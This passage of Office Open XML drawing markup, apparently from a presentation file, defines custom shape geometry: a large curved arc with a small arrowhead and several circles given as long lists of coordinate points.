                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="1942591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2052319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258695" y="2163444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2261616" y="2276220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258695" y="2388869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2499994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="2609468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217039" y="2717291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192655" y="2823210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="2926968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="3028696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089531" y="3128010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045716" y="3225037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997456" y="3319399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944878" y="3411092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887982" y="3499866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826895" y="3585717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761998" y="3668394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693291" y="3747769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620774" y="3823842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544828" y="3896359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465453" y="3965321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382776" y="4030217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1297051" y="4091304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208278" y="4148201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116711" y="4201033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022350" y="4249420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925449" y="4293234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826008" y="4332478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724408" y="4367021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620522" y="4396613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514731" y="4421124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407035" y="4440555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297434" y="4454525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186309" y="4463160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145415" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188468" y="4491608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300990" y="4482845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411988" y="4468621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521081" y="4448936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628396" y="4424171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733552" y="4394073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836549" y="4359148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937133" y="4319270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035304" y="4274820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130935" y="4225798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223772" y="4172330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313561" y="4114546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400429" y="4052697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484122" y="3986783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564513" y="3917060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641475" y="3843654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714881" y="3766566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1784477" y="3686048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850136" y="3602228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911985" y="3515359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969643" y="3425316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022856" y="3332353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071751" y="3236848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116201" y="3138550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155825" y="3037840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190623" y="2934842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220467" y="2829560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245233" y="2722244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264664" y="2613152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278761" y="2502154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287270" y="2389504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290064" y="2275458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287270" y="2161285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278634" y="2048637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264410" y="1937639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244979" y="1828418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220087" y="1720977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190368" y="1615693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155443" y="1512569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2115566" y="1411858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071242" y="1313560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022221" y="1217929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968754" y="1125092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911096" y="1035050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849120" y="948054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783207" y="864234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713484" y="783843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640078" y="706754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562989" y="633221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482471" y="563499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398651" y="497713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1311656" y="435863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221613" y="378205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128649" y="324738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033018" y="275716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934720" y="231393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833882" y="191515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730885" y="156844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625475" y="126872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518160" y="102107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408940" y="82676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297815" y="68452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185166" y="59943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="73152" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45237" y="4891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22145" y="19605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6268" y="41915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="69595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4891" y="97492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19605" y="120554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41915" y="136425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69596" y="142747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97492" y="137856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120554" y="123142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136425" y="100832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70993" y="85597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71755" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137856" y="45237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123142" y="22145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100832" y="6268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73152" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="71755" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70993" y="85597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142748" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71755" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="139943" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71755" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="5715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500877" y="3457194"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="228600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="466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75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500877" y="3457194"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229361"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229361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531357" y="7067550"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="228600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="466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531357" y="7067550"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229362"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362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348222" y="4476750"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="228600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="466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348222" y="4476750"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229362"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362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392417" y="5933694"/>
              <a:ext cx="459105" cy="457200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="459104" h="457200">
                  <a:moveTo>
                    <a:pt x="229362" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="183153" y="4644"/>
